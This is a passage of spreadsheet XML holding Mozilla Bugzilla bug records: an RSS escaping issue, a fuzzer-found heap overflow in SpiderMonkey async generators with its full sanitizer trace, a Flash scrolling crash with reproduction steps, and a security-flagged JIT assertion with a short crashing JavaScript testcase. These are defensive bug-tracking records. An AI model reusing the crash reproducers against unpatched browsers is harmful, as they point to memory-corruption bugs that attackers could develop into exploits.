      <c r="K1119" t="inlineStr">
        <is>
          <t>2.20</t>
        </is>
      </c>
      <c r="L1119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1119" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1119" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1119" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1119" t="inlineStr">
        <is>
          <t>[doesn't affect 2.16][doesn't affect 2.18][ready for 2.20.1][ready for2.21.2]</t>
        </is>
      </c>
      <c r="Q1119" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1119" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1119" t="inlineStr">
        <is>
          <t>Bugzilla 2.20</t>
        </is>
      </c>
      <c r="T1119" t="n">
        <v>0</v>
      </c>
      <c r="U1119" t="n">
        <v>0</v>
      </c>
      <c r="V1119" t="n">
        <v>48</v>
      </c>
      <c r="W1119" t="inlineStr">
        <is>
          <t>While it's formally correct and to-spec to have an RSS 1.0 &lt;title&gt; that includes &amp;lt; when it isn't starting HTML markup, since the spec calls for plain text, practically speaking the title element has been so polluted with HTML that virtually all consumers treat it as HTML, and a literal &lt; has to be double-escaped as &amp;amp;lt; to not be treated as markup, and either filtered out or interpreted.
With &lt;title&gt;Wrong DOM-tree with &amp;lt;form&amp;gt; and &amp;lt;button&amp;gt; elements.&lt;/title&gt;, my cautious RSS reader and Google Reader both display "Wrong DOM-tree with and elements.", but the very popular Bloglines reader treats them both as HTML, and displays an actual button with the text "elements." Switching to "FILTER html" instead of "FILTER xml" to get &amp;amp;lt;form&amp;amp;gt; would wind up displaying "&amp;lt;form&amp;gt;" in strict constructionist RSS readers, but anyone using them is surely used to that by now.</t>
        </is>
      </c>
      <c r="X1119" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1120">
      <c r="A1120" t="n">
        <v>1415883</v>
      </c>
      <c r="B1120" t="inlineStr">
        <is>
          <t>2017-11-09 06:29:20 -0800</t>
        </is>
      </c>
      <c r="C1120" t="inlineStr">
        <is>
          <t>Heap-buffer-overflow READ 8 with async  generators</t>
        </is>
      </c>
      <c r="D1120" t="inlineStr">
        <is>
          <t>2019-08-22 09:25:20 -0700</t>
        </is>
      </c>
      <c r="E1120" t="n">
        <v>1</v>
      </c>
      <c r="F1120" t="n">
        <v>1</v>
      </c>
      <c r="G1120" t="n">
        <v>3</v>
      </c>
      <c r="H1120" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1120" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1120" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K1120" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1120" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1120" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1120" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1120" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1120" t="inlineStr">
        <is>
          <t>[adv-main58+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q1120" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1120" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1120" t="inlineStr">
        <is>
          <t>mozilla59</t>
        </is>
      </c>
      <c r="T1120" t="n">
        <v>1</v>
      </c>
      <c r="U1120" t="n">
        <v>0</v>
      </c>
      <c r="V1120" t="n">
        <v>21</v>
      </c>
      <c r="W1120" t="inlineStr">
        <is>
          <t>Created attachment 8926854
clusterfuzz-testcase-minimized-4564957816422400.js
This bug was found by Google's OSS-Fuzz running their custom internal JS fuzzer. I am refiling it in our issue tracker.
Please note that they apply a 90-day disclose timeline to all bugs:
[Environment] ASAN_OPTIONS = redzone=256:strict_memcmp=0:allow_user_segv_handler=1:allocator_may_return_null=1:handle_sigfpe=1:handle_sigbus=1:detect_stack_use_after_return=0:alloc_dealloc_mismatch=0:print_scariness=1:max_uar_stack_size_log=16:detect_odr_violation=0:handle_sigill=1:coverage=0:use_sigaltstack=1:fast_unwind_on_fatal=1:detect_leaks=0:print_summary=1:handle_abort=1:check_malloc_usable_size=0:detect_container_overflow=1:symbolize=0:handle_segv=1
	=================================================================
	==29026==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61100032bcc0 at pc 0x0000005ff8fc bp 0x7fff9dd8dbb0 sp 0x7fff9dd8dba8
	READ of size 8 at 0x61100032bcc0 thread T0
	SCARINESS: 23 (8-byte-read-heap-buffer-overflow)
	#0 0x5ff8fb in JS::Value::toTag() const mozilla-central/js/src/build_DBG.OBJ/dist/include/js/Value.h:437:32
	#1 0x5ff8fb in JS::Value::isString() const mozilla-central/js/src/build_DBG.OBJ/dist/include/js/Value.h:512
	#2 0x5ff8fb in _ZN2js13DispatchTypedINS_17PreBarrierFunctorIN2JS5ValueEEEJEEEDTclfp_scP8JSObjectLDnEspclsr7mozillaE7ForwardIT0_Efp1_EEET_RKS3_DpOS7_ mozilla-central/js/src/build_DBG.OBJ/dist/include/js/Value.h:1431
	#3 0x6ed1e9 in js::InternalBarrierMethods&lt;JS::Value&gt;::preBarrier(JS::Value const&amp;) mozilla-central/js/src/gc/Barrier.h:283:9
	#4 0x6ed1e9 in js::WriteBarrieredBase&lt;JS::Value&gt;::pre() mozilla-central/js/src/gc/Barrier.h:374
	#5 0x6ed1e9 in js::HeapSlot::~HeapSlot() mozilla-central/js/src/gc/Barrier.h:678
	#6 0x6ed1e9 in js::NativeObject::prepareElementRangeForOverwrite(unsigned long, unsigned long) mozilla-central/js/src/vm/NativeObject.h:1007
	#7 0x6ed1e9 in js::NativeObject::setDenseInitializedLengthUnchecked(unsigned int) mozilla-central/js/src/vm/NativeObject.h:1179
	#8 0x1e243d0 in js::NativeObject::setDenseInitializedLength(unsigned int) mozilla-central/js/src/vm/NativeObject.h:1196:9
	#9 0x1e243d0 in js::AsyncGeneratorRequest* js::ShiftFromList&lt;js::AsyncGeneratorRequest&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;) mozilla-central/js/src/vm/List-inl.h:62
	    #10 0x1e10267 in js::AsyncGeneratorObject::dequeueRequest(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/vm/AsyncIteration.cpp:374:12
	    #11 0xa847c4 in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2769:13
	    #12 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #13 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #14 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #15 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #16 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #17 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #18 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #19 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #20 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #21 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #22 0x1e0bfd7 in js::AsyncGeneratorResume(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, js::CompletionKind, JS::Handle&lt;JS::Value&gt;) mozilla-central/js/src/vm/AsyncIteration.cpp:0
	    #23 0xa867e8 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2918:12
	    #24 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #25 0x1e0bfd7 in js::AsyncGeneratorResume(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, js::CompletionKind, JS::Handle&lt;JS::Value&gt;) mozilla-central/js/src/vm/AsyncIteration.cpp:0
	    #26 0xb405e3 in AsyncGeneratorPromiseReactionJob(JSContext*, JS::Handle&lt;PromiseReactionRecord*&gt;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/builtin/Promise.cpp:1122:14
	    #27 0xb405e3 in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) mozilla-central/js/src/builtin/Promise.cpp:1201
	    #28 0x8bc784 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) mozilla-central/js/src/jscntxtinlines.h:291:15
	    #29 0x8bc784 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) mozilla-central/js/src/vm/Interpreter.cpp:472
	    #30 0x8be967 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/vm/Interpreter.cpp:540:10
	    #31 0x18777ce in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/jsapi.cpp:3032:12
	    #32 0x18d8525 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JSObject*&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/jsapi.h:3595:12
	    #33 0x18d8525 in js::RunJobs(JSContext*) mozilla-central/js/src/jscntxt.cpp:1213
	    #34 0x56a2f4 in Shell(JSContext*, js::cli::OptionParser*, char**) mozilla-central/js/src/shell/js.cpp:8561:9
	    #35 0x56a2f4 in main mozilla-central/js/src/shell/js.cpp:8967
	    #36 0x7fc3a22c282f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/libc-start.c:291
	0x61100032bcc0 is located 0 bytes to the right of 64-byte region [0x61100032bc80,0x61100032bcc0)
	allocated by thread T0 here:
	#0 0x51a300 in __interceptor_realloc _asan_rtl_
	#1 0x1913512 in js_realloc(void*, unsigned long) mozilla-central/js/src/build_DBG.OBJ/dist/include/js/Utility.h:406:12
	#2 0x1913512 in unsigned char* js_pod_realloc&lt;unsigned char&gt;(unsigned char*, unsigned long, unsigned long) mozilla-central/js/src/build_DBG.OBJ/dist/include/js/Utility.h:594
	#3 0x1913512 in unsigned char* js::MallocProvider&lt;JS::Zone&gt;::maybe_pod_realloc&lt;unsigned char&gt;(unsigned char*, unsigned long, unsigned long) mozilla-central/js/src/vm/MallocProvider.h:70
	#4 0x1913512 in unsigned char* js::MallocProvider&lt;JS::Zone&gt;::pod_realloc&lt;unsigned char&gt;(unsigned char*, unsigned long, unsigned long) mozilla-central/js/src/vm/MallocProvider.h:173
	#5 0x2a1f9d3 in js::Nursery::reallocateBuffer(JSObject*, void*, unsigned long, unsigned long) mozilla-central/js/src/gc/Nursery.cpp:403:29
	#6 0x20e78c9 in js::HeapSlot* js::ReallocateObjectBuffer&lt;js::HeapSlot&gt;(JSContext*, JSObject*, js::HeapSlot*, unsigned int, unsigned int) mozilla-central/js/src/gc/Nursery-inl.h:135:48
	#7 0x20e78c9 in js::NativeObject::shrinkElements(JSContext*, unsigned int) mozilla-central/js/src/vm/NativeObject.cpp:1028
	#8 0x1e24364 in js::AsyncGeneratorRequest* js::ShiftFromList&lt;js::AsyncGeneratorRequest&gt;(JSContext*, JS::Handle&lt;js::NativeObject*&gt;) mozilla-central/js/src/vm/List-inl.h:59:15
	    #9 0x1e10267 in js::AsyncGeneratorObject::dequeueRequest(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/vm/AsyncIteration.cpp:374:12
	    #10 0xa847c4 in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2769:13
	    #11 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #12 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #13 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #14 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #15 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #16 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #17 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #18 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #19 0xa86073 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2890:16
	    #20 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #21 0x1e0bfd7 in js::AsyncGeneratorResume(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, js::CompletionKind, JS::Handle&lt;JS::Value&gt;) mozilla-central/js/src/vm/AsyncIteration.cpp:0
	    #22 0xa867e8 in AsyncGeneratorResumeNext(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;) mozilla-central/js/src/builtin/Promise.cpp:2918:12
	    #23 0xa84d8b in js::AsyncGeneratorResolve(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, JS::Handle&lt;JS::Value&gt;, bool) mozilla-central/js/src/builtin/Promise.cpp:2790:10
	    #24 0x1e0bfd7 in js::AsyncGeneratorResume(JSContext*, JS::Handle&lt;js::AsyncGeneratorObject*&gt;, js::CompletionKind, JS::Handle&lt;JS::Value&gt;) mozilla-central/js/src/vm/AsyncIteration.cpp:0
	    #25 0xb405e3 in AsyncGeneratorPromiseReactionJob(JSContext*, JS::Handle&lt;PromiseReactionRecord*&gt;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/builtin/Promise.cpp:1122:14
	    #26 0xb405e3 in PromiseReactionJob(JSContext*, unsigned int, JS::Value*) mozilla-central/js/src/builtin/Promise.cpp:1201
	    #27 0x8bc784 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) mozilla-central/js/src/jscntxtinlines.h:291:15
	    #28 0x8bc784 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) mozilla-central/js/src/vm/Interpreter.cpp:472
	    #29 0x8be967 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/vm/Interpreter.cpp:540:10
	    #30 0x18777ce in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/jsapi.cpp:3032:12
	    #31 0x18d8525 in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JSObject*&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) mozilla-central/js/src/jsapi.h:3595:12
	    #32 0x18d8525 in js::RunJobs(JSContext*) mozilla-central/js/src/jscntxt.cpp:1213
	    #33 0x56a2f4 in Shell(JSContext*, js::cli::OptionParser*, char**) mozilla-central/js/src/shell/js.cpp:8561:9
	    #34 0x56a2f4 in main mozilla-central/js/src/shell/js.cpp:8967
	    #35 0x7fc3a22c282f in __libc_start_main /build/glibc-bfm8X4/glibc-2.23/csu/libc-start.c:291
	SUMMARY: AddressSanitizer: heap-buffer-overflow (/mnt/scratch0/clusterfuzz/slave-bot/builds/clusterfuzz-builds-no-engine_spidermonkey_6aad6e0d14f81d36f48dbd887aa56b38e87859f7/revisions/js+0x5ff8fb)
	Shadow bytes around the buggy address:
	0x0c228005d740: fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228005d750: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228005d760: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
	0x0c228005d770: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228005d780: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	=&gt;0x0c228005d790: 00 00 00 00 00 00 00 00[fa]fa fa fa fa fa fa fa
	0x0c228005d7a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228005d7b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228005d7c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228005d7d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
	0x0c228005d7e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29026==ABORTING</t>
        </is>
      </c>
      <c r="X1120" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1121">
      <c r="A1121" t="n">
        <v>502648</v>
      </c>
      <c r="B1121" t="inlineStr">
        <is>
          <t>2009-07-06 10:55:03 -0700</t>
        </is>
      </c>
      <c r="C1121" t="inlineStr">
        <is>
          <t>Crash when scrolling in Flash with wmode=transparent [NPSWF32.dll@0x50abd]</t>
        </is>
      </c>
      <c r="D1121" t="inlineStr">
        <is>
          <t>2022-09-09 10:12:14 -0700</t>
        </is>
      </c>
      <c r="E1121" t="n">
        <v>1</v>
      </c>
      <c r="F1121" t="n">
        <v>1</v>
      </c>
      <c r="G1121" t="n">
        <v>6</v>
      </c>
      <c r="H1121" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1121" t="inlineStr">
        <is>
          <t>External Software Affecting Firefox Graveyard</t>
        </is>
      </c>
      <c r="J1121" t="inlineStr">
        <is>
          <t>Flash (Adobe)</t>
        </is>
      </c>
      <c r="K1121" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1121" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1121" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1121" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1121" t="inlineStr">
        <is>
          <t>WORKSFORME</t>
        </is>
      </c>
      <c r="P1121" t="inlineStr">
        <is>
          <t>[sg:vector-dos (flash)]</t>
        </is>
      </c>
      <c r="Q1121" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1121" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1121" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1121" t="n">
        <v>1</v>
      </c>
      <c r="U1121" t="n">
        <v>0</v>
      </c>
      <c r="V1121" t="n">
        <v>34</v>
      </c>
      <c r="W1121" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.9.1) Gecko/20090624 Firefox/3.5 (.NET CLR 3.5.30729)
This was first reported in bug 501304, but it seems a different bug.
From top crash reports, the following page crashes:, with good reproducibility:
http://www.crazyprofile.com/water_effect/water_effect.asp
Wait before everything is loaded. Then scroll down. Bang! Consistent.
A minimized version can be found here:
http://web.inter.nl.net/users/L.B.Kruijswijk/FFflashcrash.html
Important is:
- The flash animation must be outside the visible screen when loading.
- Scroll down to get the crash.
- The wmode='transparent' parameter is important. When I remove it, it doesn't
crash anymore.
Reproducible: Always
Steps to Reproduce:
1. Go to site.
2. Wait until everything is loaded.
3. Scroll down.
Actual Results:  
Crash.
Expected Results:  
No crash.
Crash id's:
73296a73-ed85-435a-aba0-99d382090705	6-7-2009	0:28
74d13d11-f90d-4430-a987-a72482090705	5-7-2009	18:25
66c4defa-167a-4d23-8999-81cd92090705	5-7-2009	15:29
c14f7078-5b02-429e-a752-6b7f62090705	5-7-2009	13:41
f4fee6ae-f924-4605-a6c3-7a1652090705	5-7-2009	13:37
57ce6043-257c-46ce-a677-fde5b2090704	5-7-2009	0:52
91e82746-987a-4633-af1f-7c1432090704	5-7-2009	0:48
b7cc5f3e-6276-4831-94dd-71fef2090704	5-7-2009	0:47
538e3eef-fc7f-40a9-a113-fb9e72090704	5-7-2009	0:37
8c5686fc-f982-46d5-a430-46a4b2090704	5-7-2009	0:26
ffcc3cb3-f3b7-45f9-8b46-e89162090704	5-7-2009	0:26</t>
        </is>
      </c>
      <c r="X1121" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1122">
      <c r="A1122" t="n">
        <v>1773266</v>
      </c>
      <c r="B1122" t="inlineStr">
        <is>
          <t>2022-06-08 03:57:57 -0700</t>
        </is>
      </c>
      <c r="C1122" t="inlineStr">
        <is>
          <t>Assertion failure: count.as&lt;int32_t&gt;() &gt; 0, at jit/CodeGenerator.cpp:11916</t>
        </is>
      </c>
      <c r="D1122" t="inlineStr">
        <is>
          <t>2023-12-06 07:56:04 -0800</t>
        </is>
      </c>
      <c r="E1122" t="n">
        <v>1</v>
      </c>
      <c r="F1122" t="n">
        <v>1</v>
      </c>
      <c r="G1122" t="n">
        <v>3</v>
      </c>
      <c r="H1122" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1122" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1122" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K1122" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1122" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1122" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1122" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1122" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1122" t="inlineStr">
        <is>
          <t>[bugmon:update,bisected,confirmed][adv-main104+r]</t>
        </is>
      </c>
      <c r="Q1122" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1122" t="inlineStr">
        <is>
          <t>S4</t>
        </is>
      </c>
      <c r="S1122" t="inlineStr">
        <is>
          <t>104 Branch</t>
        </is>
      </c>
      <c r="T1122" t="n">
        <v>1</v>
      </c>
      <c r="U1122" t="n">
        <v>0</v>
      </c>
      <c r="V1122" t="n">
        <v>12</v>
      </c>
      <c r="W1122" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 20220604-490469b53dbe (debug build, run with --fuzzing-safe --no-threads --fast-warmup --ion-inlining=off):
    name = re;
    var re = {};
    function inner() {
      return Array.prototype.slice.call(arguments, 1, name &amp; 1)
    }
    function outer3() {
      trialInline();
      return inner(1, 2, 3)
    }
    for (var i60 = 0; i60 &lt; 50; i60++)
      outer3();
Backtrace:
    received signal SIGSEGV, Segmentation fault.
    #0  0x0000555557a3f9da in js::jit::CodeGenerator::visitInlineArgumentsSlice(js::jit::LInlineArgumentsSlice*) ()
    #1  0x0000555557a1f0c6 in js::jit::CodeGenerator::generateBody() ()
    #2  0x0000555557a69366 in js::jit::CodeGenerator::generate() ()
    #3  0x0000555557aa1eab in js::jit::GenerateCode(js::jit::MIRGenerator*, js::jit::LIRGraph*) ()
    #4  0x0000555557aa2128 in js::jit::CompileBackEnd(js::jit::MIRGenerator*, js::jit::WarpSnapshot*) ()
    #5  0x0000555557aa349d in js::jit::Compile(JSContext*, JS::Handle&lt;JSScript*&gt;, js::jit::BaselineFrame*, unsigned char*) ()
    #6  0x0000555557aa3fbe in IonCompileScriptForBaseline(JSContext*, js::jit::BaselineFrame*, unsigned char*) ()
    #7  0x000032f4d5a6ddc5 in ?? ()
    [...]
    #14 0x0000000000000000 in ?? ()
    rax	0x55555576ea4e	93824994437710
    rbx	0x3	3
    rcx	0x5555581e8838	93825038977080
    rdx	0x0	0
    rsi	0x7ffff7105770	140737338431344
    rdi	0x7ffff7104540	140737338426688
    rbp	0x7fffffffb430	140737488335920
    rsp	0x7fffffffb330	140737488335664
    r8	0x7ffff7105770	140737338431344
    r9	0x7ffff7f99840	140737353717824
    r10	0x0	0
    r11	0x0	0
    r12	0x7fffffffb3d0	140737488335824
    r13	0x7ffff6028c00	140737320750080
    r14	0x7ffff6028000	140737320747008
    r15	0x1	1
    rip	0x555557a3f9da &lt;js::jit::CodeGenerator::visitInlineArgumentsSlice(js::jit::LInlineArgumentsSlice*)+490&gt;
    =&gt; 0x555557a3f9da &lt;_ZN2js3jit13CodeGenerator25visitInlineArgumentsSliceEPNS0_21LInlineArgumentsSliceE+490&gt;:	movl   $0x2e8c,0x0
       0x555557a3f9e5 &lt;_ZN2js3jit13CodeGenerator25visitInlineArgumentsSliceEPNS0_21LInlineArgumentsSliceE+501&gt;:	callq  0x555556be1628 &lt;abort&gt;
JIT-related assert, marking s-s until triaged.</t>
        </is>
      </c>
      <c r="X1122" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1123">
      <c r="A1123" t="n">
        <v>581882</v>
      </c>
      <c r="B1123" t="inlineStr">
        <is>
          <t>2010-07-25 22:17:06 -0700</t>
        </is>
      </c>
      <c r="C1123" t="inlineStr">
        <is>
          <t>Allocate build slaves for preproduction system</t>
        </is>
      </c>
      <c r="D1123" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E1123" t="n">
        <v>1</v>
      </c>
      <c r="F1123" t="n">
        <v>1</v>
      </c>
      <c r="G1123" t="n">
        <v>5</v>
      </c>
      <c r="H1123" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1123" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J1123" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1123" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L1123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1123" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1123" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1123" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1123" t="inlineStr">
        <is>
          <t>[buildslaves]</t>
        </is>
      </c>
      <c r="Q1123" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1123" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1123" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
